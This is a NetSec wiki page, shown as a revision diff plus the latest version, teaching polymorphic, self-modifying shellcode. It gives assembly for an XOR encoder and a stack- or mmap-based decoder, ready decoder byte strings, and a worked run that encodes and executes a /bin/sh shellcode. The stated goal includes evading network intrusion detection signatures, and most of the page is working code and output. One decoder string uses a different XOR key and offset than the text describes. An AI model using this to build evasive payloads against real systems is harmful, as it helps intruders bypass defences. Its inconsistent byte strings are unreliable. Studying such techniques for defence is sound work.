Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "Shellcode/Self-modifying"

From NetSec
Jump to: navigation, search
(Tying it together)
 
(20 intermediate revisions by 3 users not shown)
Line 1: Line 1:
[[Polymorphic]] and other self-modifying (such as self-extracting) [[shellcode]] can be used to obfuscate or help prevent the reverse engineering of the shellcode.  Additionally, it can help to prevent signature-based shellcode recognition on the network layer by [[NIDS]] or [[NIPS]] systems. The example in this article is based on [[Shellcode/Loaders|shellcode loaders]] ([[Shellcode/Appendix#Loaders|sources]]). Sources to the code in this section available in [[Shellcode/Appendix#Self-modifying|the appendix]] or by downloading [[shellcodecs]].
+
[[Polymorphic]] and other self-modifying (such as self-extracting) [[shellcode]] can be used to obfuscate or help prevent the [[reverse engineering]] of the shellcode.  Additionally, it can help to prevent signature-based shellcode recognition on the network layer by [[NIDS]] or [[NIPS]] systems. The example in this article is based on [[Shellcode/Loaders|shellcode loaders]] ([[Shellcode/Appendix#Loaders|sources]]).  
 +
 
 +
 
 +
{{info|<center>The code and ideas discussed here are part of an [[shellcode|all-encompassing shellcode portal]]. Everything described here and the full source of any given code is available in [[Shellcode/Appendix#Self-modifying|the appendix]], as well as in the downloadable [[shellcodecs]] package.</center>}}
 +
 
  
 
== The encoder ==
 
== The encoder ==
  
We will be using XOR encoding for this, but the method could easily be expanded.  There are hundreds of encoding, encryption, and compression algorithms that could be implemented such as xor, inc, dec, add, sub, imul, idiv and any other function that can be reversed to its original state, this is just a small example.  For this encoder, we will just count the characters in the shellcode and xor each character with 0x3 as we loop, then print the encoded binary.  This binary can be written to file or piped to hexdump or ndisasm for further analysis.
+
An XOR encoding will be used for this, but the method could easily be expanded.  There are hundreds of encoding, encryption, and compression algorithms that could be implemented such as xor, inc, dec, add, sub, imul, idiv and any other function that can be reversed to its original state, this is just a small example.  For this encoder, each byte will be XOR'd with 0x3 and moved back into the buffer in a loop.  This binary can be written to file or piped to hexdump or ndisasm for further analysis.
  
x86_64 source code (64 bit):
+
=== 64 bit ===
  
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
Line 23: Line 27:
 
</source>}}
 
</source>}}
  
In this 64 bit snippet of our encoder (//source can be found here:xxxxx//), we are counting the number of characters that were passed to the encoded as a command line argument. We begin by comparing the lowest bit of the %rdx register, %dil, which is zero and the first character of our argument we stored in %rbx. If the byte we tested is equal to zero we jump to our write label to print our encoded output to stdout. If the byte is not equal we xor it by 0x3 (note that 0x3 was chosen because the shellcode used does not contain this byte, this will need be to be changed if the shellcode has 0x3) and increment our counter which is stored in %rsi and jump back to the top of our counter label. The reason why we must count our characters as we process them is because the write syscall needs to know the number of bytes to print off the stack so instead of looping once to count the characters and looping again to encode them we simply combined the two processes to make our code faster and shorter.
+
In this 64 bit snippet of the encoder ([[Shellcode/Appendix#packer.s|source]]), the length of the shellcode (passed as a command line argument) is counted. The lowest byte of the %rdi register which is zero is compared to the first character of the argument stored in %rbx. If the tested byte is equal to zero the code jumps to the write label to print the encoded output. If the byte is not equal it is XOR'd with 0x3 (note that 0x3 was chosen because the shellcode used does not contain this byte, this will need be to be changed if the shellcode does contain 0x3) and the counter in %rsi is incremented and the code jumps back to the counter label. The reason the length must be counted is the write syscall needs to know the number of bytes to print off the stack so instead of looping once to count the characters and looping again to encode them the two processes are combined for efficiency.
  
x86 source code (32 bit):
+
=== 32 bit ===
  
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
Line 44: Line 48:
 
</source>}}
 
</source>}}
  
The difference between the 64 bit and 32 bit code is subtle. The main difference is that in the compare instruction we are not comparing %dil, but rather %dl because the %dil register does not exist in 32 bit code. Another difference is the write label. It instead uses the 32 bit syscall calling convention (//link to calling conventions and sys tables//) for write instead of the 64 bit calling convention (//link to calling conventions and sys tables//).
+
The difference between the 64 bit and 32 bit code is subtle. The main difference is that %dil does not exist in 32 bit code and thus %edx is used in place of %rdi. Another difference is the write label. It uses the [[Linux_assembly#Unlinked_System_Calls_for_32_bit_systems|32 bit C calling convention]] for write instead of the [[Linux_assembly#Unlinked_system_calls_for_64_bit_systems|64 bit calling convention]].
  
 
== The unpacker ==
 
== The unpacker ==
Now, we will create our decoding shellcode, this will be essentially the same as the loader code with some changes.  
+
Next, an unpacker is necessary, this will be essentially the same as the [[Shellcode/Appendix#Loaders|loader code]] with some changes.  
  
First, we need to read the shellcode from the stack instead of as command line arguments. To do this, we will need to implement a getpc (//link to getpc code above//) function to retrieve the current instruction pointer so we can find our shellcode on the stack. When calling forwards, [[Null-free_shellcode|null bytes]] are added as operands to the call instruction unless call short is explicitly defined but ultimately it is always best to call backwards for multiple reasons (including the call stack). So, we start our code with a "jmp start" instruction.  
+
First, the [[shellcode]] must be read from the stack instead of as command line arguments. To do this, a [[Shellcode/Environment#GetPc|getpc function]] needs to be implemented to retrieve the current instruction pointer so the [[shellcode]] can be found on the stack. When calling forwards, [[Null-free_shellcode|null bytes]] are added as operands to the call instruction unless call short is explicitly defined but ultimately it is always best to call backwards for multiple reasons (including the [[call stack]]). So, the code starts with a "jmp start" [[instruction]].  
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
 
jmp start
 
jmp start
 
</source>}}
 
</source>}}
  
Getpc is called and the address of the next instruction is returned in %eax or %rbx based on architecture, then we add the number of bytes in the rest of the decoder code to it; this gets the absolute address of our encoded shellcode on the stack. To find our decoder offset we must first complete our decoder code and then run it through objdump. From there we will take our address immediately after the getpc call and subtract it from the last address of our decoder (remember to add some bytes to the last address for the instructions on that line.)
+
Getpc is called and the address of the next instruction is returned in %eax or %rbx based on architecture, then the number of bytes in the rest of the decoder code is added to this address; this gets the absolute address of the encoded shellcode on the stack. To find the decoder offset the decoder must be completed and then run through objdump. From there take the address immediately after the getpc call and subtract it from the last address of the decoder (remember to add some bytes to the last address for the instructions on that line).
  
 
For example:  
 
For example:  
Line 70: Line 74:
 
</source>}}
 
</source>}}
  
The address that would be returned from the getpc call would be 8048080 and our last address in the application is 80480a8 which we must add two bytes to since there is a 2 byte instruction on that line. The real end address of our decoder in this example would be 80480aa. From here we take our returned address and our ending address and substract them to find our offset to add. In this case the offset to add would be 0xAA - 0x80 which is 0x2A.
+
The address that would be returned from the getpc call would be 8048080 and the last address in the application is 80480a8 so add two bytes to that since there is a 2 byte instruction on that line. The real end address of the decoder in this example would be 80480aa. From there take the returned address and the ending address and substract them to determine the offset to add. In this case the offset to add would be 0xAA - 0x80 which is 0x2A.
  
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
Line 78: Line 82:
 
</source>}}
 
</source>}}
  
Next, we push the address of the shellcode on the stack and call our "inject" function.  
+
Next, the address of the shellcode is pushed onto the stack and the "inject" function is called.  
  
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
Line 85: Line 89:
 
</source>}}
 
</source>}}
  
The call instruction pushes the address of the next instruction (where the program is supposed to return to) onto the stack and then jumps to the function, in this case that address will be our exit function. The return address (the address of exit) is then popped off of the stack. We pop our return address from the stack so that we can change our return address.
+
The call instruction pushes the address of the next instruction (where the program is supposed to return to) onto the stack and then jumps to the function, in this case that address will be the exit function. The return address (the address of exit) is then popped off of the stack. The return address is then popped from the stack to change the return address to the decoded shellcode.
  
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
Line 92: Line 96:
 
</source>}}
 
</source>}}
  
Then we initialize our copying loop:
+
Then the copying loop is initialized:
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
 
     xor %rsi, %rsi # zero out counter
 
     xor %rsi, %rsi # zero out counter
Line 99: Line 103:
 
</source>}}
 
</source>}}
  
First we make sure that the encoded shellcode hasn't ended (our shellcode in this example is 0x20 terminated, choose a byte that is not used in your shellcode if 0x20 is in use).
+
First, make sure that the encoded shellcode has not ended (the shellcode in this example is 0x20 terminated, choose a byte that is not used in the shellcode if 0x20 is in use).
  
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
Line 107: Line 111:
 
</source>}}
 
</source>}}
  
If not, we decode a single byte by [[xor]]'ing it against our encode-byte:
+
If not, decode a single byte by [[xor|XOR]]'ing it against the encode-byte:
  
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
Line 114: Line 118:
 
</source>}}
 
</source>}}
  
Then we copy the xor'd byte back into the shellcode:
+
Then the XOR'd byte is then copied back into the shellcode:
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
 
     movb %r10b, (%rax, %rsi, 1)
 
     movb %r10b, (%rax, %rsi, 1)
 
</source>}}
 
</source>}}
  
Now we increment our counter and start again at the beginning of inject_loop:
+
Now the counter is increment and the code jumps to the beginning of inject_loop:
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
 
     inc %rsi
 
     inc %rsi
Line 126: Line 130:
  
  
After the loop is completed, we append the ret opcode (0xc3) to the decoded shellcode.
+
After the loop is completed, the ret opcode (0xc3) is appended to the decoded shellcode.
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
 
inject_finished:
 
inject_finished:
Line 133: Line 137:
 
</source>}}
 
</source>}}
  
Next, we form a call stack by pushing the original return address (the address of exit that we popped off the stack at the beginning of this function), and then the address of our shellcode and return. Because the address of our shellcode has replaced the address of exit on our stack, we will return into the shellcode, which will in turn return into our exit function, exiting cleanly.
+
Next, a call stack is formed by pushing the original return address (the address of exit that was popped off the stack at the beginning of this function), and then the address of the shellcode and return. Because the address of the shellcode has replaced the address of exit on the stack, the program will return into the shellcode, which will in turn return into the exit function, exiting cleanly.
  
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
Line 141: Line 145:
 
</source>}}
 
</source>}}
  
When the shellcode finishes, it will execute the "ret" instruction we appended (0xc3) and return into exit; exiting cleanly.  
+
When the shellcode finishes, it will execute the appended "ret" instruction (0xc3) and return into exit.  
  
Our complete decoder is:
+
The complete decoder is:
  
 
::'''\xeb\x2c\x5f\x48\x31\xf6\x56\x5f\x80\x3c\x33\x20\x74\x11\x44\x8a\x14\x33\x41\x80\xf2\x11\x44\x88\x14\x33\x48\xff\xc6\xeb\xe9\x48\xff\xc6\xc6\x04\x33\xc3\x57\x53\xc3\x48\x8b\x1c\x24\xc3\xe8\xf6\xff\xff\xff\x48\x83\xc3\x0e\x53\xe8\xc5\xff\xff\xff\x6a\x3c\x58\x48\x31\xff\x0f\x05'''
 
::'''\xeb\x2c\x5f\x48\x31\xf6\x56\x5f\x80\x3c\x33\x20\x74\x11\x44\x8a\x14\x33\x41\x80\xf2\x11\x44\x88\x14\x33\x48\xff\xc6\xeb\xe9\x48\xff\xc6\xc6\x04\x33\xc3\x57\x53\xc3\x48\x8b\x1c\x24\xc3\xe8\xf6\xff\xff\xff\x48\x83\xc3\x0e\x53\xe8\xc5\xff\xff\xff\x6a\x3c\x58\x48\x31\xff\x0f\x05'''
Line 149: Line 153:
 
== Self-extracting code ==
 
== Self-extracting code ==
  
Self-extracting shellcode can extract itself onto executable memory, to do this we will perform a call to mmap() as detailed in [[#Executable_memory_allocation_with_mmap.28.29|this section]]. We will use the same shellcode as before but with some changes. In the start function we will call mmap() and save the pointer in %rax. We push this onto the stack before the address to the shellcode and call inject. We pop this address into %rcx and inside the inject_loop we copy the xor'd byte into the mmap()'d memory instead of back into the shellcode. Finally, we return into the mmap()'d memory instead of the shellcode. The completed code:
+
Self-extracting shellcode can extract itself onto executable memory, to do this mmap() will be used as detailed in [[#Executable_memory_allocation_with_mmap.28.29|this section]]. The same shellcode as before will be expanded but with some changes. In the start function mmap() will be called and the returned pointer saved in %rax. This address is then pushed onto the stack before the address to the shellcode and inject is then called. The address is then popped %rcx and inside the inject_loop the XOR'd byte is copied into the mmap()'d memory instead of back into the shellcode. Finally, the mmap()'d memory is returned to instead of the encoded shellcode on the stack. The completed code:
  
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
Line 170: Line 174:
  
 
== Tying it together ==
 
== Tying it together ==
To use this shellcode, your payload should look like:
+
To use this shellcode, the payload should look like:
  
 
   [decoder shellcode][encoded payload][0x20]
 
   [decoder shellcode][encoded payload][0x20]
Line 182: Line 186:
 
::'''\x4b\x32\xfc\x69\x6a\x5b\x0c\x06\x54\x54\x5d\x59\x4b\xbc\x69\x2c\x61\x6a\x6d\x2c\x70\x6b\x4b\xc2\xec\x0b\x54\x57\x5c\x69\x38\x5b\x0c\x06'''   
 
::'''\x4b\x32\xfc\x69\x6a\x5b\x0c\x06\x54\x54\x5d\x59\x4b\xbc\x69\x2c\x61\x6a\x6d\x2c\x70\x6b\x4b\xc2\xec\x0b\x54\x57\x5c\x69\x38\x5b\x0c\x06'''   
  
* Add "\x20" to the end of our newly encoded shellcode as a terminator.
+
# Add "\x20" to the end of the newly encoded shellcode as a terminator.
* Append the newly terminated shellcode to the decoder shellcode.
+
# Append the newly terminated shellcode to the decoder shellcode.
* Test the polymorphic code:
+
# Test the polymorphic code:
  
 
   ╭─user@host ~   
 
   ╭─user@host ~   
Line 196: Line 200:
 
   ╰─➤   
 
   ╰─➤   
  
When we encode the 34 byte /bin/sh shellcode and disassemble it, it looks like:
+
When the 34 byte /bin/sh shellcode is encoded and [[shellcode#Shellcode_Disassembly|disassembled]], it looks like:
  
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
Line 216: Line 220:
 
   1c: 5c                  pop    %rsp
 
   1c: 5c                  pop    %rsp
 
   1d: 69 38 5b 0c 06 38    imul  $0x38060c5b,(%rax),%edi
 
   1d: 69 38 5b 0c 06 38    imul  $0x38060c5b,(%rax),%edi
╭─rorschach@bastille ~   
+
╭─user@host ~   
 
╰─➤   
 
╰─➤   
 
</source>}}
 
</source>}}
  
This doesn't look anything like an execve() routine.  If we disassemble the entire payload we get:
+
This doesn't look anything like an execve() routine.  If the entire payload is disassembled:
  
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
Line 293: Line 297:
 
   83: 69 38 5b 0c 06 20    imul  $0x20060c5b,(%rax),%edi
 
   83: 69 38 5b 0c 06 20    imul  $0x20060c5b,(%rax),%edi
 
</source>}}
 
</source>}}
 +
 +
{{social}}

Latest revision as of 02:33, 25 April 2013

Polymorphic and other self-modifying (such as self-extracting) shellcode can be used to obfuscate or help prevent the reverse engineering of the shellcode. Additionally, it can help to prevent signature-based shellcode recognition on the network layer by NIDS or NIPS systems. The example in this article is based on shellcode loaders (sources).


c3el4.png
The code and ideas discussed here are part of an all-encompassing shellcode portal. Everything described here and the full source of any given code is available in the appendix, as well as in the downloadable shellcodecs package.


The encoder

An XOR encoding will be used for this, but the method could easily be expanded. There are hundreds of encoding, encryption, and compression algorithms that could be implemented such as xor, inc, dec, add, sub, imul, idiv and any other function that can be reversed to its original state, this is just a small example. For this encoder, each byte will be XOR'd with 0x3 and moved back into the buffer in a loop. This binary can be written to file or piped to hexdump or ndisasm for further analysis.

64 bit

 
count_chars:
    cmpb %dil, (%rbx, %rsi, 1)
    je write
    xor $0x3, (%rbx, %rsi, 1)
    inc %rsi
    jmp count_chars                 #counts characters and xor encodes them
 
write:
    mov $0x1, %rax
    mov $0x1, %rdi
    mov %rsi, %rdx
    mov %rbx, %rsi
    syscall
 

In this 64 bit snippet of the encoder (source), the length of the shellcode (passed as a command line argument) is counted. The lowest byte of the %rdi register which is zero is compared to the first character of the argument stored in %rbx. If the tested byte is equal to zero the code jumps to the write label to print the encoded output. If the byte is not equal it is XOR'd with 0x3 (note that 0x3 was chosen because the shellcode used does not contain this byte, this will need be to be changed if the shellcode does contain 0x3) and the counter in %rsi is incremented and the code jumps back to the counter label. The reason the length must be counted is the write syscall needs to know the number of bytes to print off the stack so instead of looping once to count the characters and looping again to encode them the two processes are combined for efficiency.

32 bit

 
count_chars:
        cmpb %dl, (%ecx, %ebx, 1)
        je write
        xor $0x3, (%ecx, %ebx, 1)
        inc %ebx
        jmp count_chars                 #counts characters and xor encodes them
 
write:
        push $4
        pop %eax
        mov %ebx, %edx
        push $2
        pop %ebx
        int $0x80
 

The difference between the 64 bit and 32 bit code is subtle. The main difference is that %dil does not exist in 32 bit code and thus %edx is used in place of %rdi. Another difference is the write label. It uses the 32 bit C calling convention for write instead of the 64 bit calling convention.

The unpacker

Next, an unpacker is necessary, this will be essentially the same as the loader code with some changes.

First, the shellcode must be read from the stack instead of as command line arguments. To do this, a getpc function needs to be implemented to retrieve the current instruction pointer so the shellcode can be found on the stack. When calling forwards, null bytes are added as operands to the call instruction unless call short is explicitly defined but ultimately it is always best to call backwards for multiple reasons (including the call stack). So, the code starts with a "jmp start" instruction.

 
jmp start
 

Getpc is called and the address of the next instruction is returned in %eax or %rbx based on architecture, then the number of bytes in the rest of the decoder code is added to this address; this gets the absolute address of the encoded shellcode on the stack. To find the decoder offset the decoder must be completed and then run through objdump. From there take the address immediately after the getpc call and subtract it from the last address of the decoder (remember to add some bytes to the last address for the instructions on that line).

For example:

 
0804807b <start>:
 804807b:       e8 f7 ff ff ff          call   8048077 <getpc>
 8048080:       89 c2                   mov    %eax,%edx
 8048082:       83 c2 2a                add    $0x2a,%edx
 
 #shortened for easier reading
 
 80480a8:       cd 80                   int    $0x80
 
 

The address that would be returned from the getpc call would be 8048080 and the last address in the application is 80480a8 so add two bytes to that since there is a 2 byte instruction on that line. The real end address of the decoder in this example would be 80480aa. From there take the returned address and the ending address and substract them to determine the offset to add. In this case the offset to add would be 0xAA - 0x80 which is 0x2A.

 
start:
    call getpc
    add $0x31,%rbx # add the length of the rest of the decoder to the instruction pointer to get the address of the encoded payload
 

Next, the address of the shellcode is pushed onto the stack and the "inject" function is called.

 
    push %rbx # push address of shellcode
    call inject
 

The call instruction pushes the address of the next instruction (where the program is supposed to return to) onto the stack and then jumps to the function, in this case that address will be the exit function. The return address (the address of exit) is then popped off of the stack. The return address is then popped from the stack to change the return address to the decoded shellcode.

 
inject: 
    pop %rdi # pop the return address (to exit)
 

Then the copying loop is initialized:

 
    xor %rsi, %rsi # zero out counter
    push %rsi
    pop %rdi    
 

First, make sure that the encoded shellcode has not ended (the shellcode in this example is 0x20 terminated, choose a byte that is not used in the shellcode if 0x20 is in use).

 
inject_loop:
    cmpb $0x20, (%rax, %rsi, 1)
    je inject_finished
 

If not, decode a single byte by XOR'ing it against the encode-byte:

 
    movb (%rax, %rsi, 1), %r10b 
    xor $0x3, %r10b
 

Then the XOR'd byte is then copied back into the shellcode:

 
    movb %r10b, (%rax, %rsi, 1)
 

Now the counter is increment and the code jumps to the beginning of inject_loop:

 
    inc %rsi
    jmp inject_loop
 


After the loop is completed, the ret opcode (0xc3) is appended to the decoded shellcode.

 
inject_finished:
    inc %rsi 
    movb $0xc3, (%rax, %rsi, 1) # append 0xc3 (the ret opcode)
 

Next, a call stack is formed by pushing the original return address (the address of exit that was popped off the stack at the beginning of this function), and then the address of the shellcode and return. Because the address of the shellcode has replaced the address of exit on the stack, the program will return into the shellcode, which will in turn return into the exit function, exiting cleanly.

 
    push %rdi                   # push original return address onto stack
    push %rax                   # push address of shellcode to stack
    ret                         # return into shellcode
 

When the shellcode finishes, it will execute the appended "ret" instruction (0xc3) and return into exit.

The complete decoder is:

\xeb\x2c\x5f\x48\x31\xf6\x56\x5f\x80\x3c\x33\x20\x74\x11\x44\x8a\x14\x33\x41\x80\xf2\x11\x44\x88\x14\x33\x48\xff\xc6\xeb\xe9\x48\xff\xc6\xc6\x04\x33\xc3\x57\x53\xc3\x48\x8b\x1c\x24\xc3\xe8\xf6\xff\xff\xff\x48\x83\xc3\x0e\x53\xe8\xc5\xff\xff\xff\x6a\x3c\x58\x48\x31\xff\x0f\x05

Self-extracting code

Self-extracting shellcode can extract itself onto executable memory, to do this mmap() will be used as detailed in this section. The same shellcode as before will be expanded but with some changes. In the start function mmap() will be called and the returned pointer saved in %rax. This address is then pushed onto the stack before the address to the shellcode and inject is then called. The address is then popped %rcx and inside the inject_loop the XOR'd byte is copied into the mmap()'d memory instead of back into the shellcode. Finally, the mmap()'d memory is returned to instead of the encoded shellcode on the stack. The completed code:

 
inject_loop:
    cmpb $0x20, (%rax, %rsi, 1)
    je inject_finished
    movb (%rax, %rsi, 1), %r10b
    xor $0x3, %r10b
    movb %r10b, (%rcx, %rsi, 1)
    inc %rsi
    jmp inject_loop
 
inject_finished:
    inc %rsi 
    movb $0xc3, (%rcx, %rsi, 1)
    push %rdi
    push %rcx
    ret
 

Tying it together

To use this shellcode, the payload should look like:

 [decoder shellcode][encoded payload][0x20]

A usage example:

 ╭─user@host ~  
 ╰─➤    ./packer "$(echo -en "\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58
 \x0f\x05");" |hexdump -C |sed 's/^[0-9a-f]........//g' |sed 's/|.*|$//g' |sed 's/  / /g' |sed 's/ /\\x/g' |sed 's/\\x\\x//g' |sed 's/\\x$//g' |grep x |awk '{printf("%s ", $0)}' |sed 's/ //g'
\x4b\x32\xfc\x69\x6a\x5b\x0c\x06\x54\x54\x5d\x59\x4b\xbc\x69\x2c\x61\x6a\x6d\x2c\x70\x6b\x4b\xc2\xec\x0b\x54\x57\x5c\x69\x38\x5b\x0c\x06
  1. Add "\x20" to the end of the newly encoded shellcode as a terminator.
  2. Append the newly terminated shellcode to the decoder shellcode.
  3. Test the polymorphic code:
 ╭─user@host ~  
 ╰─➤  ./loader "$(echo -en 
 "\xeb\x2c\x5f\x48\x31\xf6\x56\x5f\x80\x3c\x33\x20\x74\x11\x44\x8a\x14\x33\x41\x80\xf2\x11\x44\x88\x14\x33\x48\xff\xc6\xeb\xe9\x48\xff\xc6\xc6\x04\x33
  \xc3\x57\x53\xc3\x48\x8b\x1c\x24\xc3\xe8\xf6\xff\xff\xff\x48\x83\xc3\x0e\x53\xe8\xc5\xff\xff\xff\x6a\x3c\x58\x48\x31\xff\x0f\x05\x4b\x32\xfc\x69\x6a
  \x5b\x0c\x06\x54\x54\x5d\x59\x4b\xbc\x69\x2c\x61\x6a\x6d\x2c\x70\x6b\x4b\xc2\xec\x0b\x54\x57\x5c\x69\x38\x5b\x0c\x06\x20")"
 [rorschach@bastille ~]$ exit
 exit
 ╭─user@host ~  
 ╰─➤  

When the 34 byte /bin/sh shellcode is encoded and disassembled, it looks like:

 
╭─user@host ~  
╰─➤  ./packer "$(echo -en "\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58 
\x0f\x05");" > shellcode; objdump -b binary -m i386 -M x86-64 -D shellcode 
shellcode:     file format binary
Disassembly of section .data:
00000000 <.data>:
  0:	4b 32 fc             	rex.WXB xor %r12b,%dil
  3:	69 6a 5b 0c 06 54 54 	imul   $0x5454060c,0x5b(%rdx),%ebp
  a:	5d                   	pop    %rbp
  b:	59                   	pop    %rcx
  c:	4b bc 69 2c 61 6a 6d 	rex.WXB movabs $0x6b702c6d6a612c69,%r12
  13:	2c 70 6b 
  16:	4b c2 ec 0b          	rex.WXB retq $0xbec
  1a:	54                   	push   %rsp
  1b:	57                   	push   %rdi
  1c:	5c                   	pop    %rsp
  1d:	69 38 5b 0c 06 38    	imul   $0x38060c5b,(%rax),%edi
╭─user@host ~  
╰─➤  
 

This doesn't look anything like an execve() routine. If the entire payload is disassembled:

 
╭─user@host ~  
╰─➤  echo -en  "\xeb\x2e\x5f\x58\x59\x48\x31\xf6\x56\x5f\x80\x3c\x30\x20\x74\x11\x44\x8a\x14\x30\x41\x80\xf2\x03\x44\x88\x14\x31\x48\xff\xc6\xeb\xe9\x48\xff\xc6
\xc6\x04\x31\xc3\x57\x51\xc3\x48\x8b\x1c\x24\xc3\xe8\xf6\xff\xff\xff\x48\x83\xc3\x31\x6a\x09\x58\x48\x31\xff\x57\x5e\x48\xff\xc6\x48\xc1\xe6\x12\x6a\x07\x5a\x6a
\x22\x41\x5a\x57\x57\x41\x58\x41\x59\x0f\x05\x50\x53\xe8\xa4\xff\xff\xff\x6a\x3c\x58\x48\x31\xff\x0f\x05\x4b\x32\xfc\x69\x6a\x5b\x0c\x06\x54\x54\x5d\x59\x4b\xbc
\x69\x2c\x61\x6a\x6d\x2c\x70\x6b\x4b\xc2\xec\x0b\x54\x57\x5c\x69\x38\x5b\x0c\x06\x20" > shellcode; objdump -b binary -m i386 -M x86-64 -D shellcode
 
shellcode:     file format binary
 
 
Disassembly of section .data:
 
00000000 <.data>:
   0:	eb 2e                	jmp    0x30
   2:	5f                   	pop    %rdi
   3:	58                   	pop    %rax
   4:	59                   	pop    %rcx
   5:	48 31 f6             	xor    %rsi,%rsi
   8:	56                   	push   %rsi
   9:	5f                   	pop    %rdi
   a:	80 3c 30 20          	cmpb   $0x20,(%rax,%rsi,1)
   e:	74 11                	je     0x21
  10:	44 8a 14 30          	mov    (%rax,%rsi,1),%r10b
  14:	41 80 f2 03          	xor    $0x3,%r10b
  18:	44 88 14 31          	mov    %r10b,(%rcx,%rsi,1)
  1c:	48 ff c6             	inc    %rsi
  1f:	eb e9                	jmp    0xa
  21:	48 ff c6             	inc    %rsi
  24:	c6 04 31 c3          	movb   $0xc3,(%rcx,%rsi,1)
  28:	57                   	push   %rdi
  29:	51                   	push   %rcx
  2a:	c3                   	retq   
  2b:	48 8b 1c 24          	mov    (%rsp),%rbx
  2f:	c3                   	retq   
  30:	e8 f6 ff ff ff       	callq  0x2b
  35:	48 83 c3 31          	add    $0x31,%rbx
  39:	6a 09                	pushq  $0x9
  3b:	58                   	pop    %rax
  3c:	48 31 ff             	xor    %rdi,%rdi
  3f:	57                   	push   %rdi
  40:	5e                   	pop    %rsi
  41:	48 ff c6             	inc    %rsi
  44:	48 c1 e6 12          	shl    $0x12,%rsi
  48:	6a 07                	pushq  $0x7
  4a:	5a                   	pop    %rdx
  4b:	6a 22                	pushq  $0x22
  4d:	41 5a                	pop    %r10
  4f:	57                   	push   %rdi
  50:	57                   	push   %rdi
  51:	41 58                	pop    %r8
  53:	41 59                	pop    %r9
  55:	0f 05                	syscall 
  57:	50                   	push   %rax
  58:	53                   	push   %rbx
  59:	e8 a4 ff ff ff       	callq  0x2
  5e:	6a 3c                	pushq  $0x3c
  60:	58                   	pop    %rax
  61:	48 31 ff             	xor    %rdi,%rdi
  64:	0f 05                	syscall 
  66:	4b 32 fc             	rex.WXB xor %r12b,%dil
  69:	69 6a 5b 0c 06 54 54 	imul   $0x5454060c,0x5b(%rdx),%ebp
  70:	5d                   	pop    %rbp
  71:	59                   	pop    %rcx
  72:	4b bc 69 2c 61 6a 6d 	rex.WXB movabs $0x6b702c6d6a612c69,%r12
  79:	2c 70 6b 
  7c:	4b c2 ec 0b          	rex.WXB retq $0xbec
  80:	54                   	push   %rsp
  81:	57                   	push   %rdi
  82:	5c                   	pop    %rsp
  83:	69 38 5b 0c 06 20    	imul   $0x20060c5b,(%rax),%edi